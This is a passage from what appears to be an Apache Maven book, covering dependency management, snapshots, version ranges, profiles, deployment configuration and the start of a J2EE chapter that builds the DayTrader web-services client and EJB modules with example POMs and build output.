          <version>${project.version}</version>
        </dependency>
        <dependency>
          <groupId>org.apache.maven.proficio</groupId>
          <artifactId>proficio-api</artifactId>
          <version>${project.version}</version>
        </dependency>
        <dependency>
          <groupId>org.apache.maven.proficio</groupId>
          <artifactId>proficio-core</artifactId>
          <version>${project.version}</version>
        </dependency>
        <dependency>
          <groupId>org.codehaus.plexus</groupId>
          <artifactId>plexus-container-default</artifactId>
          <version>1.0-alpha-9</version>
        </dependency>
      </dependencies>
    </dependencyManagement>
    ...
  </project>

Note that the ${project.version} specification is the version specified by the top-level POM's version element, which is the application version. As you can see within the dependency management section, we have several Proficio dependencies and a dependency for the Plexus IoC container.

There is an important distinction to be made between the dependencies element contained within the dependencyManagement element and the top-level dependencies element in the POM. The dependencies stated in dependencyManagement only come into play when a dependency is declared without a version, whereas the top-level dependencies element does affect the dependency graph. If you take a look at the POM for the proficio-api module, you will see a single dependency declaration, and that it does not specify a version:

  <project>
    ...
    <dependencies>
      <dependency>
        <groupId>org.apache.maven.proficio</groupId>
        <artifactId>proficio-model</artifactId>
      </dependency>
    </dependencies>
    ...
  </project>

The dependencyManagement section declares a stated preference for the 1.0-SNAPSHOT version (stated as ${project.version}) of proficio-model, so that version is injected into the dependency above, to make it complete.
3.5. Using Snapshots

While you are developing an application with multiple modules, it is usually the case that each of the modules is in flux. Your APIs might be undergoing some change, or your implementations are undergoing change and are being fleshed out, or you may be doing some refactoring. Your build system needs to be able to deal easily with this real-time flux, and this is where Maven's concept of a snapshot comes into play. A snapshot in Maven is an artifact that has been prepared using the most recent sources available. If you look at the top-level POM for Proficio you will see a snapshot version specified:

  <project>
    ...
    <version>1.0-SNAPSHOT</version>
    <dependencyManagement>
      <dependencies>
        <dependency>
          <groupId>org.apache.maven.proficio</groupId>
          <artifactId>proficio-api</artifactId>
          <version>${project.version}</version>
        </dependency>
        <dependency>
          <groupId>org.apache.maven.proficio</groupId>
          <artifactId>proficio-model</artifactId>
          <version>${project.version}</version>
        </dependency>
        <dependency>
          <groupId>org.codehaus.plexus</groupId>
          <artifactId>plexus-container-default</artifactId>
          <version>1.0-alpha-9</version>
        </dependency>
      </dependencies>
    </dependencyManagement>
    ...
  </project>

Specifying a snapshot version for a dependency means that Maven will look for new versions of that dependency without you having to manually specify a new version. Snapshot dependencies are assumed to be changing, so Maven will attempt to update them. By default Maven will look for snapshots on a daily basis, but you can use the -U command line option to force the search for updates. When you specify a non-snapshot version of a dependency, Maven will download that dependency once and never attempt to retrieve it again. Controlling how snapshots work will be explained in detail in Chapter 7.
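If the daily check is too infrequent while modules are changing rapidly, there are two levers you can pull. Both sketches below are illustrative only; the repository id and URL are placeholders, not part of the Proficio example. First, force an update check for a single run:

  mvn -U install

Second, a repository definition can raise the check frequency through its snapshots section (updatePolicy also accepts daily, never, or interval:N minutes):

  <repository>
    <id>internal-snapshots</id>
    <url>http://repository.mycompany.com/snapshots</url>
    <snapshots>
      <updatePolicy>always</updatePolicy>
    </snapshots>
  </repository>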
3.6. Resolving Dependency Conflicts and Using Version Ranges

With the introduction of transitive dependencies in Maven 2.0, it became possible to simplify a POM by including only the dependencies you need directly, and allowing Maven to calculate the full dependency graph. However, as the graph grows, it is inevitable that two or more artifacts will require different versions of a particular dependency. In this case, Maven must choose which version to provide. In Maven, the version selected is the one declared "nearest" to the top of the tree - that is, Maven selects the version that requires the least number of dependencies to be traversed. A dependency in the POM being built will be used over anything else. However, this has limitations:

• The version chosen may not have all the features required by the other dependencies.
• If multiple versions are selected at the same depth, then the result is undefined.

While further dependency management features are scheduled for the next release of Maven at the time of writing, there are ways to manually resolve these conflicts as the end user of a dependency, and more importantly, ways to avoid them as the author of a reusable library.

To manually resolve conflicts, you can remove the incorrect version from the tree, or you can override both with the correct version. Removing the incorrect version requires identifying the source of the incorrect version by running Maven with the -X flag (for more information on how to do this, see section 6.9 in Chapter 6). For example, if you run mvn -X test on the proficio-core module, the output will contain something similar to:

  proficio-core:1.0-SNAPSHOT
    junit:3.8.1 (selected for test)
    plexus-container-default:1.0-alpha-9 (selected for compile)
      plexus-utils:1.0.4 (selected for compile)
      classworlds:1.1-alpha-2 (selected for compile)
      junit:3.8.1 (not setting, local scope test wins)
    proficio-api:1.0-SNAPSHOT (selected for compile)
      proficio-model:1.0-SNAPSHOT (selected for compile)
    plexus-utils:1.1 (selected for compile)
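On a non-trivial project the -X output is long, so it helps to narrow it down to the artifact you care about. The pipeline below is a sketch for a Unix-style shell (on Windows, findstr plays the same role as grep):

  mvn -X test | grep plexus-utils

This quickly shows every line that mentions the artifact, and therefore which versions were considered and where they entered the graph.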
In this example, plexus-utils occurs twice, and Proficio requires that version 1.1 be used. Once the path to the unwanted version has been identified, you can exclude the dependency from the graph by adding an exclusion to the dependency that introduced it. To ensure that the 1.1 version is used, modify the plexus-container-default dependency in the proficio-core/pom.xml file as follows:

  ...
  <dependencies>
    <dependency>
      <groupId>org.codehaus.plexus</groupId>
      <artifactId>plexus-container-default</artifactId>
      <version>1.0-alpha-9</version>
      <exclusions>
        <exclusion>
          <groupId>org.codehaus.plexus</groupId>
          <artifactId>plexus-utils</artifactId>
        </exclusion>
      </exclusions>
    </dependency>
    ...
  </dependencies>
  ...

This ensures that Maven ignores the 1.0.4 version of plexus-utils in the dependency graph, so that the 1.1 version is used instead.

The alternate way to ensure that a particular version of a dependency is used is to include it directly in the POM, as follows:

  ...
  <dependency>
    <groupId>org.codehaus.plexus</groupId>
    <artifactId>plexus-utils</artifactId>
    <version>1.1</version>
    <scope>runtime</scope>
  </dependency>
  ...

You'll notice that the runtime scope is used here. This is because, in this situation, the dependency is used only for packaging, not for compilation. However, if the dependency were required for compilation, for stability it would always be declared in the current POM as a dependency - regardless of whether another dependency introduces it.

Neither of these solutions is ideal, because each distorts the true dependency graph, and that distortion will accumulate if this project is reused as a dependency itself. For that reason, the direct-inclusion approach is not recommended unless you are producing an artifact that is bundling its dependencies and is not used as a dependency itself (for example, a WAR file). This is extremely important if you are publishing a build, for a library or framework, that will be used widely by others. It is possible to improve the quality of your own dependencies to reduce the risk of these issues occurring with your own build artifacts: use version ranges instead.
When a version is declared as 1.1, as shown above for plexus-utils, this indicates that the preferred version of the dependency is 1.1, but that other versions may be acceptable. Maven has no knowledge regarding which versions will work, so in the case of a conflict with another dependency, Maven assumes that all versions are valid and uses the "nearest dependency" technique described previously to determine which version to use.

However, you may require a feature that was introduced in plexus-utils version 1.1. In this case, the dependency should be specified as follows:

  <dependency>
    <groupId>org.codehaus.plexus</groupId>
    <artifactId>plexus-utils</artifactId>
    <version>[1.1,)</version>
  </dependency>

What this means is that, while the nearest dependency technique will still be used in the case of a conflict, the version that is used must fit the range given; in this example, the version you are left with is [1.1,), that is, greater than or equal to 1.1. If the nearest version does not match, then the next nearest will be tested, and so on. Finally, if none of them match, or there were no conflicts originally, the latest version that fits will be retrieved from the repository.

The notation used above is set notation, and table 3-2 shows some of the values that can be used.

Table 3-2: Examples of Version Ranges

  Range            Meaning
  (,1.0]           Less than or equal to 1.0
  [1.2,1.3]        Between 1.2 and 1.3 (inclusive)
  [1.0,2.0)        Greater than or equal to 1.0, but less than 2.0
  [1.5,)           Greater than or equal to 1.5
  (,1.1),(1.1,)    Any version, except 1.1

By being more specific through the use of version ranges, it is possible to make the dependency mechanism more reliable for your builds and to reduce the number of exception cases that will be required. However, you need to avoid being overly specific as well. For instance, if two version ranges in a dependency graph do not intersect at all, the build will fail.

To understand how version ranges work, it is necessary to understand how versions are compared. In figure 3-3, you can see how a version is partitioned by Maven.

Figure 3-3: Version parsing

If you take a look at the POM for the proficio-cli module you will see the following profile definitions:

  <project>
    ...
    <!-- Profiles for the two assemblies to create for deployment -->
    <profiles>
      <profile>
        <id>memory</id>
        <build>
          <plugins>
            <plugin>
              <artifactId>maven-assembly-plugin</artifactId>
              <configuration>
                <descriptors>
                  <descriptor>[...].xml</descriptor>
                </descriptors>
              </configuration>
            </plugin>
          </plugins>
        </build>
        <activation>
          <property>
            <name>memory</name>
          </property>
        </activation>
      </profile>
      <!-- ... a second, analogous profile with an id of xstream ... -->
    </profiles>
  </project>
You can see there are two profiles: one with an id of memory and another with an id of xstream. In each of these profiles you are configuring the assembly plugin to point at the assembly descriptor that will create a tailored assembly. You will also notice that the profiles are activated using a system property. If you wanted to create the assembly using the memory-based store, you would execute the following:

  mvn -Dmemory clean assembly:assembly

If you wanted to create the assembly using the XStream-based store, you would execute the following:

  mvn -Dxstream clean assembly:assembly

Both of the assemblies are created in the target directory, and if you use the jar tvf command on the resulting assemblies, you will see that the memory-based assembly contains the proficio-store-memory-1.0-SNAPSHOT.jar file only, while the XStream-based assembly contains the proficio-store-xstream-1.0-SNAPSHOT.jar file only. This is a very simple example, but it illustrates how you can customize the execution of the life cycle using profiles to suit any requirement you might have.

3.9. Deploying your Application

Now that you have an application assembly, you'll want to share it with as many people as possible! So, it is now time to deploy your application. Currently Maven supports several methods of deployment, including simple file-based deployment, SSH2 deployment, SFTP deployment, FTP deployment, and external SSH deployment. In order to deploy, you need to correctly configure the distributionManagement element in your POM, which would typically be your top-level POM, so that all child POMs can inherit this information. Here are some examples of how to configure your POM for the various deployment mechanisms. It should be noted that the examples below depend on other parts of the build having been executed beforehand, so it might be useful to run mvn install at the top level of the project to ensure that needed components are installed into the local repository.

3.9.1. Deploying to the File System

To deploy to the file system you would use something like the following:

  <project>
    ...
    <distributionManagement>
      <repository>
        <id>proficio-repository</id>
        <name>Proficio Repository</name>
        <url>file://${basedir}/target/deploy</url>
      </repository>
    </distributionManagement>
    ...
  </project>
3.9.2. Deploying with SSH2

To deploy to an SSH2 server you would use something like the following:

  <project>
    ...
    <distributionManagement>
      <repository>
        <id>proficio-repository</id>
        <name>Proficio Repository</name>
        <url>scp://sshserver.yourcompany.com/deploy</url>
      </repository>
    </distributionManagement>
    ...
  </project>

3.9.3. Deploying with SFTP

To deploy to an SFTP server you would use something like the following:

  <project>
    ...
    <distributionManagement>
      <repository>
        <id>proficio-repository</id>
        <name>Proficio Repository</name>
        <url>sftp://[...]yourcompany.com/deploy</url>
      </repository>
    </distributionManagement>
    ...
  </project>
3.9.4. Deploying with an External SSH

The first three methods illustrated are included with Maven, so only the distributionManagement element is required. But to use an external SSH command to deploy, you must configure not only the distributionManagement element, but also a build extension:

  <project>
    ...
    <distributionManagement>
      <repository>
        <id>proficio-repository</id>
        <name>Proficio Repository</name>
        <url>scpexe://sshserver.yourcompany.com/deploy</url>
      </repository>
    </distributionManagement>
    <build>
      <extensions>
        <extension>
          <groupId>org.apache.maven.wagon</groupId>
          <artifactId>wagon-ssh-external</artifactId>
          <version>1.0-alpha-6</version>
        </extension>
      </extensions>
    </build>
    ...
  </project>

The build extension specifies the use of the Wagon external SSH provider, which does the work of moving your files to the remote server. Wagon is the general purpose transport mechanism used throughout Maven.
3.9.5. Deploying with FTP

To deploy with FTP you must also specify a build extension. To deploy to an FTP server you would use something like the following:

  <project>
    ...
    <distributionManagement>
      <repository>
        <id>proficio-repository</id>
        <name>Proficio Repository</name>
        <url>ftp://[...]</url>
      </repository>
    </distributionManagement>
    <build>
      <extensions>
        <extension>
          <groupId>org.apache.maven.wagon</groupId>
          <artifactId>wagon-ftp</artifactId>
          <version>1.0-alpha-6</version>
        </extension>
      </extensions>
    </build>
    ...
  </project>

Once you have configured your POM accordingly, and you are ready to initiate deployment, simply execute the following command:

  mvn deploy
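For any of the protocols that require authentication (SSH2, SFTP, external SSH, FTP), the credentials do not go in the POM. They belong in the user's settings.xml, in a server entry whose id matches the repository id used above. The sketch below is illustrative; the user name and key location are placeholders:

  <settings>
    ...
    <servers>
      <server>
        <id>proficio-repository</id>
        <username>deployer</username>
        <!-- either a password, or a privateKey/passphrase pair -->
        <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      </server>
    </servers>
    ...
  </settings>

Keeping credentials in settings.xml means the POM can be shared and versioned without leaking account details.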
3.10. Creating a Web Site for your Application

Now that you have walked though the process of building, testing and deploying Proficio, it is time for you to see how to create a standard web site for an application. For applications like Proficio, it is recommended that you create a source directory at the top level of the directory structure to store the resources that are used to generate the web site. If you take a look, you will see something similar to the following:

Figure 3-4: The site directory structure

Everything that you need to generate the Web site resides within the src/site directory. Maven supports a number of different documentation formats to accommodate various needs and preferences, and within the src/site directory there is a subdirectory for each of the supported documentation formats that you are using for your site, as well as the very important site descriptor.
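The site descriptor (src/site/site.xml) controls the navigation and look of the generated site. The snippet below is only a rough sketch of what one might look like for Proficio; the menu entries and page names are illustrative, not taken from the book's sample:

  <project name="Proficio">
    <body>
      <menu name="Proficio">
        <item name="Introduction" href="index.html"/>
        <item name="FAQ" href="faq.html"/>
      </menu>
    </body>
  </project>

Each item simply points at a page produced from one of the documentation formats described next.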
Currently, the most well supported formats available are:

• The APT format (Almost Plain Text), which is a wiki-like format that allows you to write simple, structured documents (like this) very quickly. A full reference of the APT format is available.
• The XDOC format, which is a simple XML format used widely at Apache.
• The FML format, which is the FAQ format: a simple XML format for managing FAQs.
• The DocBook Simple format, which is a less complex version of the full DocBook format.

Maven also has limited support for:

• The Twiki format, which is a popular Wiki markup format.
• The Confluence format, which is another popular Wiki markup format.
• The DocBook format.

We will look at a few of the more well-supported formats later in the chapter.
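To give a feel for APT, here is a small hand-written sketch of a page that could live at src/site/apt/index.apt. The title, author and content are invented for illustration; consult the APT reference for the full syntax:

   ------
   Welcome to Proficio
   ------
   The Proficio Team
   ------

  Introduction

    Proficio is a simple application for managing frequently asked
    questions, and it is built entirely with Maven.

    * Indented lines beginning with an asterisk form a bulleted list.

    * Plain indented lines form paragraphs.

Running mvn site turns each such source file into an HTML page styled according to the site descriptor.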
4. Building J2EE Applications

This chapter covers:

• Organizing the directory structure
• Building J2EE archives (EJB, WAR, EAR, Web Services)
• Setting up in-place Web development
• Deploying J2EE archives to a container
• Automating container start/stop

Keep your face to the sun and you will never see the shadows.

  - Helen Keller
4.1. Introduction

J2EE (or Java EE as it is now called) applications are everywhere. Whether you are using the full J2EE stack with EJBs, or only using Web applications with frameworks such as Spring or Hibernate, it's likely that you are using J2EE in some of your projects. As a consequence, the Maven community has developed plugins to cover every aspect of building J2EE applications. This chapter demonstrates how to use Maven on a real application, to show how to address the complex issues related to automated builds. It will take you through the journey of creating the build for a full-fledged J2EE application called DayTrader. Through this example, you'll learn how to build EARs, EJBs, Web services, and Web applications. You'll learn not only how to create a J2EE build, but also how to create a productive development environment (especially for Web application development) and how to deploy J2EE modules into your container. As importantly, you'll learn how to automate configuration and deployment of J2EE application servers.

4.2. Introducing the DayTrader Application

DayTrader is a real world application developed by IBM and then donated to the Apache Geronimo project. Its goal is to serve as both a functional example of a full-stack J2EE 1.4 application and as a test bed for running performance tests. The functional goal of the DayTrader application is to buy and sell stock, and its architecture is shown in Figure 4-1.

Figure 4-1: Architecture of the DayTrader application
There are 4 layers in the architecture:

• The Client layer offers 3 ways to access the application: using a browser, using Web services, and using the Quote Streamer. The Quote Streamer is a Swing GUI application that monitors quote information about stocks in real-time as the price changes.
• The Web layer offers a view of the application for both the Web client and the Web services client. It uses servlets and JSPs.
• The EJB layer is where the business logic is. It uses container-managed persistence (CMP) entity beans for storing the business objects (Order, Account, Holding, Quote and AccountProfile), and Message-Driven Beans (MDB) to send purchase orders and get quote changes. The Trade Session is a stateless session bean that offers the business services such as login, logout, get a stock quote, buy or sell a stock, cancel an order, and so on.
• The Data layer consists of a database used for storing the business objects and the status of each purchase, and a JMS Server for interacting with the outside world.

A typical "buy stock" use case consists of the following steps that were shown in Figure 4-1:

1. The user gives a buy order (by using the Web client or the Web services client).
2. This request is handled by the Trade Session bean.
3. A new "open" order is saved in the database using the CMP Entity Beans.
4. The order is then queued for processing in the JMS Message Server. The creation of the "open" order is confirmed for the user.
5. Asynchronously, the order that was placed on the queue is processed and the purchase completed. Once this happens the Trade Broker MDB is notified.
6. The Trade Broker calls the Trade Session bean, which in turn calls the CMP entity beans to mark the order as "completed". The user is notified of the completed order on a subsequent request.
4.3. Organizing the DayTrader Directory Structure

The first step to organizing the directory structure is deciding what build modules are required. The easy answer is to follow Maven's artifact guideline: one module = one main artifact. Thus you simply need to figure out what artifacts you need. Looking again at Figure 4-1, you can see that the following modules will be needed:

• A module producing an EJB which will contain all of the server-side EJBs.
• A module producing a WAR which will contain the Web application.
• A module producing a JAR that will contain the Quote Streamer client application.
• A module producing another JAR that will contain the Web services client application.
• In addition you may need another module producing an EAR which will contain the EJB and WAR produced from the other modules. This EAR will be used to easily deploy the server code into a J2EE container.

Note that this is the minimal number of modules required; it is possible to come up with more. For example, you may want to split the WAR module into 2 WAR modules (one for the browser client and one for the Web services client) if you needed to physically locate the WARs in separate servlet containers to distribute the load. On the other hand, if there isn't a strong need, you may find that managing several modules is more cumbersome than useful. As a general rule, it is important to split the modules when it is appropriate for flexibility, and best practices suggest to do this only when the need arises.

The next step is to give these modules names and map them to a directory structure. As a general rule, it is better to find functional names for modules. However, it is usually easier to choose names that represent a technology instead. For the DayTrader application the following names were chosen:

• ejb - the module containing the EJBs
• web - the module containing the Web application
• streamer - the module containing the client side streamer application
• wsappclient - the module containing the Web services client application
• ear - the module producing the EAR which packages the EJBs and the Web application

There are two possible layouts that you can use to organize these modules: a flat directory structure and a nested one. Let's discuss the pros and cons of each layout. Figure 4-2 shows these modules in a flat directory structure. It is flat because you're locating all the modules in the same directory.

Figure 4-2: Module names and a simple flat directory structure

The top-level daytrader/pom.xml file contains the POM elements that are shared between all of the modules. This file also contains the list of modules that Maven will build when executed from this directory (see Chapter 3, Creating Applications with Maven, for more details):

  [...]
  <modules>
    <module>ejb</module>
    <module>web</module>
    <module>streamer</module>
    <module>wsappclient</module>
    <module>ear</module>
  </modules>
  [...]
This is the easiest and most flexible structure to use, and is the structure used in this chapter. However, if you have many modules in the same directory, you may consider finding commonalities between them and creating subdirectories to partition them. Note that in this case the modules are still separate, not nested within each other. For example, you might separate the client side modules from the server side modules in the way shown in Figure 4-3.

Figure 4-3: Modules split according to a server-side vs client-side directory organization

As before, each directory level containing several modules contains a pom.xml file with the shared POM elements and the list of modules underneath.

The other alternative is to use a nested directory structure, as shown in Figure 4-4. In this case, the ejb and web modules are nested in the ear module. This makes sense, as the EAR artifact is composed of the EJB and WAR artifacts produced by the ejb and web modules. Having this nested structure clearly shows how nested modules are linked to their parent.

Figure 4-4: Nested directory structure for the EAR, EJB and Web modules
However, even though the nested directory structure seems to work quite well here, it has several drawbacks:

• Eclipse users will have issues with this structure, as Eclipse doesn't yet support nested projects. You'd need to consider the three modules as one project, but then you'll be restricted in several ways. For example, the three modules wouldn't be able to have different natures (Web application project, EJB project, EAR project).
• It doesn't allow flexible packaging. For example, the ejb or web modules might depend on a utility JAR, and this JAR may also be required for some other EAR. Or the ejb module might be producing a client EJB JAR which is not used by the EAR, but by some client-side application. These examples show that there are times when there is not a clear parent for a module. In those cases using a nested directory structure should be avoided.
• In addition, the nested strategy doesn't fit very well with the Assembler role as described in the J2EE specification. The Assembler has a pool of modules and its role is to package those modules for deployment. Depending on the target deployment environment, the Assembler may package things differently: one EAR for one environment, or two EARs for another environment where a different set of machines is used. A flat layout is more neutral with regard to assembly and should thus be preferred.

Now that you have decided on the directory structure for the DayTrader application, you're going to create the Maven build for each module, starting with the wsappclient module, after we take care of one more matter of business. The modules we will work with from here on will each be referring to the parent pom.xml of the project, so before we move on to developing these sub-projects we need to install the parent POM into our local repository so it can be further built on:

  [INFO] --------------------------------------------------------------------
  [INFO] Building DayTrader :: Performance Benchmark Sample
  [INFO]    task-segment: [install]
  [INFO] --------------------------------------------------------------------
  [INFO] [site:attach-descriptor]
  [INFO] [install:install]
  [INFO] Installing C:\dev\m2book\code\j2ee\daytrader\pom.xml to
   C:\[...]\.m2\repository\org\apache\geronimo\samples\daytrader\daytrader\
   1.0\daytrader-1.0.pom

We are now ready to continue on with developing the sub-projects!
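Incidentally, if you only want to install the parent POM itself, without Maven descending into every module listed in its modules section, the non-recursive flag is one way to do it (a sketch; run it from the daytrader directory):

  cd daytrader
  mvn -N install

The -N (--non-recursive) option restricts the reactor to the current project, which is exactly what is needed here, since only the parent's pom file has to reach the local repository.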
4.4. Building a Web Services Client Project

Web Services are a part of many J2EE applications, and Maven's ability to integrate toolkits can make them easier to add to the build process. For example, the Maven plugin called Axis Tools plugin takes WSDL files and generates the Java files needed to interact with the Web services they define. As the name suggests, the plugin uses the Axis framework (see http://ws.apache.org/axis/java/userguide.html#WSDL2JavaBuildingStubsSkeletonsAndDataTypesFromWSDL), and this will be used from DayTrader's wsappclient module. We start our building process off by visiting the Web services portion of the build, since it is a dependency of later build stages.

Figure 4-5 shows the directory structure of the wsappclient module. As you may notice, the WSDL files are in src/main/wsdl, which is the default used by the Axis Tools plugin:

Figure 4-5: Directory structure of the wsappclient module
The location of WSDL source can be customized using the sourceDirectory property. For example:

  [...]
  <plugin>
    <groupId>org.codehaus.mojo</groupId>
    <artifactId>axistools-maven-plugin</artifactId>
    <configuration>
      <sourceDirectory>
        src/main/resources/META-INF/wsdl
      </sourceDirectory>
    </configuration>
  [...]

In order to generate the Java source files from the TradeServices.wsdl file, the wsappclient/pom.xml file must declare and configure the Axis Tools plugin:

  <project>
    [...]
    <build>
      <plugins>
        [...]
        <plugin>
          <groupId>org.codehaus.mojo</groupId>
          <artifactId>axistools-maven-plugin</artifactId>
          <executions>
            <execution>
              <goals>
                <goal>wsdl2java</goal>
              </goals>
            </execution>
          </executions>
        </plugin>
        [...]
      </plugins>
    </build>
    [...]
  </project>

At this point, if you were to execute the build, it would fail. This is because, after the sources are generated, you will require a dependency on Axis and Axis JAXRPC in your pom.xml to compile them. While you might expect the Axis Tools plugin to define this for you, it is required for two reasons: it allows you to control what version of the dependency to use regardless of what the Axis Tools plugin was built against, and more importantly, it allows users of your project to automatically get the dependency transitively. Similarly, any tools that report on the POM will be able to recognize the dependency.
As before, you need to add the J2EE specifications JAR to compile the project's Java sources. Thus add the following three dependencies to your POM:

  <dependencies>
    <dependency>
      <groupId>axis</groupId>
      <artifactId>axis</artifactId>
      <version>1.2</version>
      <scope>provided</scope>
    </dependency>
    <dependency>
      <groupId>axis</groupId>
      <artifactId>axis-jaxrpc</artifactId>
      <version>1.2</version>
      <scope>provided</scope>
    </dependency>
    <dependency>
      <groupId>org.apache.geronimo.specs</groupId>
      <artifactId>geronimo-j2ee_1.4_spec</artifactId>
      <version>1.0</version>
      <scope>provided</scope>
    </dependency>
  </dependencies>

The Axis JAR depends on the Mail and Activation Sun JARs, which cannot be redistributed by Maven. Thus, they are not present on ibiblio and you'll need to install them manually. Run mvn install and Maven will fail and print the installation instructions.
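The instructions Maven prints include the exact install:install-file invocations to run. The command below is only a sketch of what they look like; the coordinates, version and file path are placeholders, so always copy the values from the message Maven prints for your build:

  mvn install:install-file -DgroupId=javax.mail -DartifactId=mail \
      -Dversion=1.3.2 -Dpackaging=jar -Dfile=/path/to/mail.jar

A similar command is needed for the Activation JAR. Once both are in the local repository, the build can proceed.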
After manually installing Mail and Activation, running the build with mvn install leads to:

  C:\dev\m2book\code\j2ee\daytrader\wsappclient>mvn install
  [...]
  [INFO] [axistools:wsdl2java {execution: default}]
  [INFO] about to add compile source root
  [INFO] processing wsdl: C:\dev\m2book\code\j2ee\daytrader\wsappclient\
   src\main\wsdl\TradeServices.wsdl
  [INFO] [resources:resources]
  [INFO] Using default encoding to copy filtered resources.
  [INFO] [compiler:compile]
  Compiling 13 source files to
   C:\dev\m2book\code\j2ee\daytrader\wsappclient\target\classes
  [INFO] [resources:testResources]
  [INFO] Using default encoding to copy filtered resources.
  [INFO] [compiler:testCompile]
  [INFO] No sources to compile
  [INFO] [surefire:test]
  [INFO] No tests to run.
  [INFO] [jar:jar]
  [INFO] Building jar: C:\dev\m2book\code\j2ee\daytrader\wsappclient\
   target\daytrader-wsappclient-1.0.jar
  [INFO] [install:install]
  [INFO] Installing C:\dev\m2book\code\j2ee\daytrader\wsappclient\
   target\daytrader-wsappclient-1.0.jar to C:\[...]\.m2\repository\
   org\apache\geronimo\samples\daytrader\daytrader-wsappclient\1.0\
   daytrader-wsappclient-1.0.jar
  [...]

Note that the daytrader-wsappclient JAR now includes the class files compiled from the generated source files, in addition to those from the standard source directory. The Axis Tools reference documentation can be found at http://mojo.codehaus.org/axistools-maven-plugin/.

The Axis Tools plugin boasts several other goals, including java2wsdl, which is useful for generating the server-side WSDL file from handcrafted Java classes. The generated WSDL file could then be injected into the Web Services client module to generate client-side Java files. But that's another story.

Now that we have discussed and built the Web services portion, let's visit EJBs next.
4.5. Building an EJB Project

The ejb module follows Maven's standard directory layout. More specifically:

• Runtime classpath resources go in src/main/resources. The standard ejb-jar.xml deployment descriptor is in src/main/resources/META-INF/ejb-jar.xml. Any container-specific deployment descriptor should also be placed in this directory.
• Unit tests go in src/test/java, and classpath resources for the unit tests in src/test/resources. Unit tests are tests that execute in isolation from the container. Tests that require the container to run are called integration tests and are covered at the end of this chapter.
Now, take a look at the content of this project's pom.xml file:

  <project>
    <modelVersion>4.0.0</modelVersion>
    <parent>
      <groupId>org.apache.geronimo.samples.daytrader</groupId>
      <artifactId>daytrader</artifactId>
      <version>1.0</version>
    </parent>
    <artifactId>daytrader-ejb</artifactId>
    <name>Apache Geronimo DayTrader EJB Module</name>
    <packaging>ejb</packaging>
    <description>DayTrader EJBs</description>
    <dependencies>
      <dependency>
        <groupId>org.apache.geronimo.samples.daytrader</groupId>
        <artifactId>daytrader-wsappclient</artifactId>
        <version>1.0</version>
        <scope>compile</scope>
      </dependency>
      <dependency>
        <groupId>org.apache.geronimo.specs</groupId>
        <artifactId>geronimo-j2ee_1.4_spec</artifactId>
        <version>1.0</version>
        <scope>provided</scope>
      </dependency>
      <dependency>
        <groupId>commons-logging</groupId>
        <artifactId>commons-logging</artifactId>
        <version>1.0.3</version>
        <scope>provided</scope>
      </dependency>
    </dependencies>
    <build>
      <plugins>
        <plugin>
          <groupId>org.apache.maven.plugins</groupId>
          <artifactId>maven-ejb-plugin</artifactId>
          <configuration>
            <generateClient>true</generateClient>
            <clientExcludes>
              <clientExclude>**/ejb/*Bean.class</clientExclude>
            </clientExcludes>
          </configuration>
        </plugin>
      </plugins>
    </build>
  </project>

As you can see, you're extending a parent POM using the parent element. This is because the DayTrader build is a multi-module build, and you are gathering common POM elements in a parent daytrader/pom.xml file. If you look through the dependencies, you should see that we are ready to continue with building and installing this portion of the build.
The ejb/pom.xml file is a standard POM file except for three items:

• You need to tell Maven that this project is an EJB project, so that it generates an EJB JAR when the package phase is called. This is done by specifying:

    <packaging>ejb</packaging>

• As you're compiling J2EE code, you need to have the J2EE specifications JAR in the project's build classpath. This is achieved by specifying a dependency element on the J2EE JAR. However, this JAR is not redistributable and as such cannot be found on ibiblio. Fortunately, the Geronimo project has made the J2EE JAR available under an Apache license, and this JAR can be found on ibiblio. You should note that you're using a provided scope instead of the default compile scope. The reason is that this dependency will already be present in the environment (being the J2EE application server) where your EJB will execute; you make this clear to Maven by using the provided scope. Even though this dependency is provided at runtime, it still needs to be listed in the POM so that the code can be compiled. This also prevents the EAR module from including the J2EE JAR when it is packaged.

• Lastly, the pom.xml contains a configuration to tell the Maven EJB plugin to generate a client EJB JAR file when mvn install is called. The client JAR will be used in a later example, when building the web module. By default the EJB plugin does not generate the client JAR, so you must explicitly tell it to do so:

    <plugin>
      <groupId>org.apache.maven.plugins</groupId>
      <artifactId>maven-ejb-plugin</artifactId>
      <configuration>
        <generateClient>true</generateClient>
        <clientExcludes>
          <clientExclude>**/ejb/*Bean.class</clientExclude>
        </clientExcludes>
      </configuration>
    </plugin>

The EJB plugin has a default set of files to exclude from the client EJB JAR: **/*Bean.class, **/*CMP.class, **/*Session.class and **/package.html.
In this example, you need to override the defaults using a clientExclude element, because it happens that there are some required non-EJB files matching the default **/*Bean.class pattern which need to be present in the generated client EJB JAR. Thus you're specifying a pattern that only excludes from the generated client EJB JAR the EJB implementation classes located in the ejb package (**/ejb/*Bean.class). Note that it's also possible to specify a list of files to include, using clientInclude elements.

You're now ready to execute the build. Relax and type mvn install:

  C:\dev\m2book\code\j2ee\daytrader\ejb>mvn install
  [INFO] Scanning for projects...
  [INFO] ----------------------------------------------------------
  [INFO] Building DayTrader :: EJBs
  [INFO]    task-segment: [install]
  [INFO] ----------------------------------------------------------
  [INFO] [resources:resources]
  [INFO] Using default encoding to copy filtered resources.
  [INFO] [compiler:compile]
  Compiling 49 source files to C:\dev\m2book\code\j2ee\daytrader\ejb\target\classes
  [INFO] [resources:testResources]
  [INFO] Using default encoding to copy filtered resources.
  [...]
  [surefire] Running org.apache.geronimo.samples.daytrader.FinancialUtilsTest
  [surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 0.02 sec

  Results :
  [surefire] Tests run: 1, Failures: 0, Errors: 0

  [INFO] [ejb:ejb]
  [INFO] Building ejb daytrader-ejb-1.0
  [INFO] Building jar: C:\dev\m2book\code\j2ee\daytrader\ejb\
   target\daytrader-ejb-1.0.jar
  [INFO] Building ejb client daytrader-ejb-1.0-client
  [INFO] Building jar: C:\dev\m2book\code\j2ee\daytrader\ejb\
   target\daytrader-ejb-1.0-client.jar
  [INFO] [install:install]
  [INFO] Installing C:\dev\m2book\code\j2ee\daytrader\ejb\
   target\daytrader-ejb-1.0.jar to C:\[...]\.m2\repository\org\apache\geronimo\
   samples\daytrader\daytrader-ejb\1.0\daytrader-ejb-1.0.jar
  [INFO] Installing C:\dev\m2book\code\j2ee\daytrader\ejb\
   target\daytrader-ejb-1.0-client.jar to C:\[...]\.m2\repository\org\apache\geronimo\
   samples\daytrader\daytrader-ejb\1.0\daytrader-ejb-1.0-client.jar

Maven has created both the EJB JAR and the client EJB JAR and installed them in your local Maven repository.
